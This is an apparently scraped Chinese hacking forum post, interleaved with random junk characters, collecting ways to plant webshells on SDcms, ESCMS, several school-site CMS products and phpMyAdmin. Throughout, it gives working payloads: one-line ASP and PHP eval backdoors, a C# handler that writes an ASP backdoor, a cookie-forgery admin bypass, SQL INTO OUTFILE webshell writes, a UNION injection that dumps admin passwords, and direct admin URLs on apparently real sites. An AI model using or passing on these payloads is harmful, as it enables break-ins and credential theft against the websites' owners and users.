<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post"># ~7 K1 f5 `% |0 S. z
Upload a new file:<br>
6 n- L+ U6 {4 J% l4 N<input type="file" name="NewFile" size="50"><br>/ a, z) p7 S" ~8 V
<input id="btnUpload" type="submit" value="Upload">6 a0 g5 v0 [" q( h. k
</form>
. ~, q* p+ y, C& \8 w I' K- k-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' G( U& x' v. q5 S- R3 P1 M+ Z9 l8 U# z$ w5 i
SDcms 后台拿webshell7 I* |. Q5 n) ?4 v5 Z
9 @' q) Q) A: Z" j
第一种方法:) x6 o5 s1 Z( c. R6 Y
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
% y. L8 \0 K( w# ^$ f P0 L7 Y把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx+ Z7 \+ u; Q" }
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
: G( V+ w @ O, W Z( t第二种方法:
& d" E9 B2 }- p, d$ E1 _ f进入后台-->系统管理-->系统设置-->系统设置->上传设置;( v- w( `& i" I* U0 `; K
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
% r% p$ |. @" ^( Y: ~& y+ _第三种方法:
5 ^8 u2 b+ m6 n5 [进入后台-->界面管理-->模板文件管理-->创建文件# t9 W+ D/ Q+ @8 U7 ]
文件名写入getshell.ashx: O1 m3 w+ I. v
内容写入下面内容:# L( g% C m# C) [, j: S P2 N
/====================复制下面的=========================/$ m. |6 _4 x+ W- K/ X
<%@ WebHandler Language="C#" Class="Handler" %>
; }+ a; b7 P& A1 \using System;- m, O& } l" q
using System.Web;
6 r2 i' M* A) R, y9 D2 `3 {1 Rusing System.IO;
" h7 ]& b/ b0 w( jpublic class Handler : IHttpHandler {; O0 K2 W' v5 h9 W% ^6 N
public void ProcessRequest (HttpContext context) {$ h2 e' z6 ?3 I( m$ g
context.Response.ContentType = "text/plain";: Z9 |; s; w# D2 B& g# {
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));- W+ f: o5 _6 V7 v
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
6 b7 ?0 x1 U |4 |* }) J0 Bfile1.Flush();# d& @; A6 @# @- h# m1 W
file1.Close();
) j8 D; P9 u7 c- n( D- Z2 ?}) K/ D- @9 n$ n
public bool IsReusable {/ L' E0 _ z0 i3 x x% ~0 ]/ P8 d
get {+ ^5 s" L' |, b. n. n+ w
return false;
1 R. A4 o3 V0 C' O}
. p9 z0 x* I9 y: @) d}
0 _3 V6 J/ y. V" r) k7 f7 }}
9 D( c n2 L; Z6 ]/=============================================/
1 p9 z; d. w4 q) M: ]! }0 h) A7 e访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx2 i7 F4 n& V7 n1 Z- T1 P
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接0 [( P! x6 p7 w: ^% \
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------& p5 g E: i* C( [( N
. {8 S; ~9 H: c' G! z9 QESCMS网站管理系统0day. [/ s5 Z# U0 A6 l$ D3 _
x6 J0 s v2 j' V9 ?% Q
后台登陆验证是通过admin/check.asp实现的
' X' u4 K4 _+ k4 l1 x7 r+ W# z0 v2 D
首先我们打开http://target.com/admin/es_index.html% [4 H0 k" Q4 ]0 y4 r* h; N5 n
然后在COOKIE结尾加上' H9 u9 V" J" ?: o% ~' A# d
; ESCMS$_SP2=ES_admin=st0p;8 k: w- h7 Z, |: X1 `0 U
修改,然后刷新9 ~/ ^5 R: E+ J% {0 U4 l7 y: h
进后台了嘎... V9 N6 Z% Y1 `- x+ V" v* q0 v6 U
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
$ Y$ S# `9 S. M6 S! e) g% p8 e% D+ Y
+ ^: M# A1 l1 F$ s: ]! u利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.8 ?/ q4 z- p2 }
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
* k3 p/ a# ]4 K0 W6 V y7 U9 F7 q存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
; U1 \& L* A4 h8 A在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了8 n( H& n* Y( l1 F
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------' I- @; E1 ]% s" ~
0 h0 R( y8 k: D0 N I0 T宁志网站管理系统后台无验证漏洞及修复
4 b, g6 y e8 ~0 p* Y
7 t- e9 X$ T [6 B, Q7 ?( Q$ z网上搜了一下,好像没有发布.如有雷同纯粹巧合!* o; ]! i. m9 b5 x. ~" W
官方网站:www.ningzhi.net* L6 A+ a( B9 b5 E7 A2 V. A
学校网站管理系统 V.2011版本
) r1 D5 l/ U% Uhttp://down.chinaz.com/soft/29943.htm 4 r2 X. l9 d! G7 {
其它版本(如:政府版等),自行下载.
4 R& R& ]( Y$ x/ a6 j. a' f" R2 y; G漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
0 i0 B* E ~* z+ V) w/ ylogin.asp代码如下:( A ]- J; `6 X/ x3 }+ F
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
- M5 T& V9 Y0 Mmanage.asp代码我就不帖出来了.反正也没验证.
" w" }4 X2 U8 }/ O; G; S. e只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!. `" t; u1 v) i! c% a
漏洞利用:
) i, A& E2 g, k: B' \7 A( H直接访问http://www.0855.tv/admin/manage.asp5 f1 T5 y2 _/ y- z/ S4 H
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
* A* J: k+ @, C+ ?7 Y----------------------------------------------------------------------------------------------------------------------------------------------------------------------------% q* t2 O4 k X+ S$ Y2 {
2 P$ j' U7 H0 I+ R0 c/ T: ^! _
phpmyadmin拿shell的四种方法总结及修复+ l. x8 A1 [* _, F# P8 o, D4 z
9 ]6 H* T( C$ {方法一:
( w$ t% X. s$ L- X! v SCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
: v2 ~2 ?6 H3 }6 BINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
; ^$ Z% c* ^4 w% D! wSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
" P# S, x( j1 J, a7 Y----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
7 Z9 q D1 T8 x 一句话连接密码:7on+ ^" O1 \3 ?: K9 w
方法二:
5 f6 L( X" Y3 t* x: h" } h, x读取文件内容: select load_file('E:/xamp/www/s.php');
) g2 I: f% P4 ?9 r1 f写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'' J! m8 P1 W( u" t- p6 ~
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
: Y# b0 B( ^4 p# Q0 [; D方法三:3 @2 @5 t% K; O1 k
JhackJ版本 PHPmyadmin拿shell
& r+ }* _9 P$ C* e! @Create TABLE study (cmd text NOT NULL);9 f' n6 P1 M$ E5 u% g, a0 [
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
3 A r1 ?) W' z) c5 _% cselect cmd from study into outfile 'E:/wamp/www/7.php';. q5 ^, `, ?- q2 W: P
Drop TABLE IF EXISTS study;
: b) H/ C: S, T+ r6 U<?php eval($_POST[cmd])?>5 b3 P) s0 k$ L7 r
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
& R4 k* n4 z- |2 f' b1 g( A8 F% `% p* iINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 17 S: l- w# K' @1 u/ C. u
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1, V/ Z1 W1 w3 V; y3 o; P4 ~" Q" B
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。2 b+ X E' t- s6 A! Z: U" ?
方法四:& m4 N' a+ K8 {! W3 M3 z) h9 w
select load_file('E:/xamp/www/study.php');
) Q @ l: ]8 }! P+ l" \+ jselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
' h/ A7 T5 g9 l& f& A! B然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
! }9 `" Z, s4 e: a; M q- \-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 ?6 S& }) R- A+ A" T. S
9 h; ^( v+ m8 A8 eNO.001中学网站管理系统 Build 110628 注入漏洞
' |6 q0 u0 X: a2 c, l% B
; A1 R' E1 L" }) p7 `& X) h2 ANO.001中学网站管理系统功能模块:
$ l8 d( Q' e. W& Z1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等- Q. M" N) ]% D5 Q( D, A
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
; L5 M% O, ^3 E1 C3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息3 \: l9 x' l$ Y* V
4.视频图片管理:一级分类,动态添加视频或者图片等信息
) d. x7 P5 {# o8 [% n5.留言管理:对留言,修改,删除、回复等管理* \% ?7 ^9 g' x1 i: t0 o+ I
6.校友频道:包括校友资料excel导出、管理等功能
" H( z' l7 r6 D# i1 g8 T7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页/ i3 I4 J( f( L& f1 w9 o! p
默认后台:admin/login.asp; f% e, n p6 ~' E& Z
官方演示:http://demo.001cms.net
; ]2 f! O7 g6 j9 }. q4 P4 R源码下载地址:http://down.chinaz.com/soft/30187.htm2 S2 z- W7 N' ?9 w. L
EXP:
$ P; y& J" }8 b$ p( \: H6 Lunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin( Z- J9 K" u# m' q% C
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
0 A* V9 l5 O- V6 a( k7 d; Agetshell:后台有备份,你懂的9 A1 s _6 d/ t5 ^! F/ E
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。" x/ ?3 S& [. m% \; d; `+ O' s8 G
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对